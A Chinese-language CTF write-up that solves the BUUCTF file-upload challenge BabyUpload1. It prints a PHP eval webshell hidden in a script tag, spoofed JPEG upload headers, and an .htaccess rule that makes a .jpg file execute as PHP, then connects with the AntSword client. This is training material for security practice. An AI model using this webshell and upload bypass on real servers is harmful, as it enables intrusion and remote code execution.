BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析

解题思路

打开靶场,看到文件上传位置

结合题目,是一道文件上传题。

题目考察的跟之前有一道基本一样,图片内容并没有检查,检查了后缀名、文件类型以及文件是否有php内容,过滤还是比较丰富的。

这里双写绕过、后缀绕过基本不行。首先我们要绕过php内容检测,用基本的script绕过就可以

复制代码
<script language="php">@eval($_POST['123']);</script>

我认为比较坑的来了,这里要用jpg,不能用png,感觉题目是把p这个字符给过滤了...

我上传真的图片.png,都给我拦截了...

复制代码
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

然后就是老演员,解析文件.htaccess,可以让我们的jpg文件解析成php文件

复制代码
ontent-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

然后用蚁剑连接即可,这里注意路径,从upload开始哈

最终在根目录下找到flag

总结

一道基础的文件上传解析漏洞,那个png上传不了,给我弄迷糊了...连接上去看了下源码

还真不给上传Png..

相关推荐
小李独爱秋1 小时前
计算机网络经典问题透视:什么是NAPT?它有哪些特点?
网络·网络协议·计算机网络·网络安全·智能路由器
Whoami!2 小时前
⸢ 拾叁-Ⅱ⸥⤳ 安全水位评估框架(下):安全水位指标
网络安全·信息安全·安全水位指标
知花实央l2 小时前
【Web应用实战】 文件上传漏洞实战:Low/Medium/High三级绕过(一句话木马拿webshell全流程)
前端·学习·网络安全·安全架构
合作小小程序员小小店3 小时前
web安全开发,在线%服务器日志入侵检测%系统安全开发,基于Python,flaskWeb,正则表达式检测,mysql数据库
服务器·python·安全·web安全·flask·安全威胁分析·安全架构
还是奇怪6 小时前
隐藏在字符编码中的陷阱:深入剖析宽字节注入
数据库·sql·安全·web安全
介一安全7 小时前
从 0 到 1 玩转 2025 最新 WebGoat 靶场:环境搭建 + 全关卡漏洞解析(超级详细)
java·web安全·网络安全·靶场
闲人编程13 小时前
Python在网络安全中的应用:编写一个简单的端口扫描器
网络·python·web安全·硬件·端口·codecapsule·扫描器
网安小白的进阶之路18 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-5
网络·安全·web安全
sadandbad20 小时前
[vulhub靶机通关]DC-2(rbash绕过_git提权)
网络·sql·web安全·网络安全
麦烤楽鸡翅1 天前
幂数加密(攻防世界)
网络安全·密码学·ctf·crypto·解密·攻防世界·幂数加密